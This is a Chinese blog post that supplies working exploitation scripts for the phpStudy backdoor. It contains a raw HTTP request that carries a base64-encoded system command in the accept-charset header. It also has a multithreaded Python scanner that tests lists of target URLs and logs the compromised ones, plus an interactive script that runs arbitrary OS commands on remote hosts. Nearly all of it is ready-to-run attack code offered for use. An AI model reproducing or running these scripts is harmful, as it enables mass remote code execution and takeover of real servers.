• phpstudy后门rce批量利用脚本


    写两个 一个批量检测的  一个交互式shell的 

    暂时py  图形化的qt写出来..有点问题

    后门包 :

    GET / HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Connection: close
    accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
    Accept-Encoding: gzip,deflate
    Upgrade-Insecure-Requests: 1

     

    执行那段写shell即可 

    晚上抽点空简单写个发包的py:

    #!/usr/bin/env python3
    #-*- encoding:utf-8 -*-
    # 卿 博客:https://www.cnblogs.com/-qing-/
    
    import base64
    import requests
    import threading
    import queue
    
    
    print("======Phpstudy Backdoor Exploit============
    ")
    print("===========By  Qing=================
    ")
    print("=====Blog:https://www.cnblogs.com/-qing-/==
    ")
    payload = "echo "qing";"
    payload = base64.b64encode(payload.encode('utf-8'))
    payload = str(payload, 'utf-8')
    headers = {
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'accept-charset': payload,
        'Accept-Encoding': 'gzip,deflate',
        'Connection': 'close',
    }
    
    
    
    def write_shell(url,headers):
        try:
            r = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)
            if "qing" in r.text:
                print ('[ + ] BackDoor successful: '+url+'===============[ + ]
    ')
                with open('success.txt','a') as f:
                        f.write(url+'
    ')
            else:
                print ('[ - ] BackDoor failed: '+url+'[ - ]
    ')
        except:
            print ('[ - ] Timeout: '+url+' [ - ]
    ')
    
    url = "http://xxx"
    write_shell(url=url,headers=headers)

    界面优化、改下多线程、批量读取文本文件后的代码:

    #!/usr/bin/env python3
    #-*- encoding:utf-8 -*-
    # 卿 博客:https://www.cnblogs.com/-qing-/
    
    import base64
    import requests
    import threading
    import threadpool
    
    
    print("======Phpstudy Backdoor Exploit============
    ")
    print("===========By  Qing=================
    ")
    print("=====Blog:https://www.cnblogs.com/-qing-/==
    ")
    
    
    
    
    def write_shell(url):
        payload = "echo "qing";"
        payload = base64.b64encode(payload.encode('utf-8'))
        payload = str(payload, 'utf-8')
        headers = {
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'accept-charset': payload,
        'Accept-Encoding': 'gzip,deflate',
        'Connection': 'close',
    }
        try:
            r = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)
            if "qing" in r.text:
                print ('[ + ] BackDoor successful: '+url+'===============[ + ]
    ')
                with open('success.txt','a') as f:
                        f.write(url+'
    ')
            else:
                print ('[ - ] BackDoor failed: '+url+'[ - ]
    ')
        except:
            print ('[ - ] Timeout: '+url+' [ - ]
    ')
    
    # url = "http://xxx"
    # write_shell(url=url,headers=headers)
    
    def main():
        with open('url.txt','r') as f:
            lines = f.read().splitlines()
            task_pool=threadpool.ThreadPool(5)
            requests=threadpool.makeRequests(write_shell,lines)
        for req in requests:
            task_pool.putRequest(req)
            task_pool.wait() 
    if __name__ == '__main__':
        main()
    
    
    #线程队列部分
    # th=[]
    # th_num=10
    # for x in range(th_num):
    #         t=threading.Thread(target=write_shell)
    #         th.append(t)
    # for x in range(th_num):
    #         th[x].start()
    # for x in range(th_num):
    #         th[x].join()

     

    你也可以加上读取php文件的字典  这个简单没啥说的

    下一个是交互式shell

    #!/usr/bin/env python3
    #-*- encoding:utf-8 -*-
    # 卿 博客:https://www.cnblogs.com/-qing-/
    
    import base64
    import requests
    import threading
    import threadpool
    import re
    
    print("======Phpstudy Backdoor Exploit---os-shell============
    ")
    print("===========By  Qing=================
    ")
    print("=====Blog:https://www.cnblogs.com/-qing-/==
    ")
    
    
    
    def os_shell(url,headers,payload):
        try:
            r = requests.get(url=url+'/phpinfo.php',headers=headers,verify=False,timeout=10)
            # print(r.text)
            res = re.findall("qing(.*?)qing",r.text,re.S)
            print("[ + ]===========The Response:==========[ + ]
    ")
            res = "".join(res)
            print(res)
        except:
            print("[ - ]===========Failed! Timeout...==========[ - ]
    ")
    
    def main():
        url = input("input the Url , example:"http://127.0.0.1/"
    ")
        payload = input("input the payload , default:echo system("whoami");
    ")
        de_payload = "echo "qing";system("whoami");echo "qing";"
        if payload.strip() == '':
            payload = de_payload
        payload = "echo "qing";"+payload+"echo "qing";"
        payload = base64.b64encode(payload.encode('utf-8'))
        payload = str(payload, 'utf-8')
        headers = {
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'accept-charset': payload,
        'Accept-Encoding': 'gzip,deflate',
        'Connection': 'close',
        }
        os_shell(url=url,headers=headers,payload=payload)
    if __name__ == '__main__':
        main()

  • 相关阅读:
    sp_executesql介绍和使用
    jQuery中的 return false, e.preventDefault(), e.stopPropagation()的区别
    clearfix:after 清除css浮动
    paip.mysql 性能跟iops的以及硬盘缓存的关系
    paip.mysql 性能测试 报告 home right
    paip.mysql 性能测试by mysqlslap
    paip.java 架构师之路以及java高级技术
    paip. 提升性能---hibernate的缓存使用 总结
    paip. 解决php 以及 python 连接access无效的参数量。参数不足,期待是 1”的错误
    paip.解决access出现 -2147467259 无效的参数量
  • 原文地址:https://www.cnblogs.com/-qing-/p/11575622.html
Copyright © 2020-2023  润新知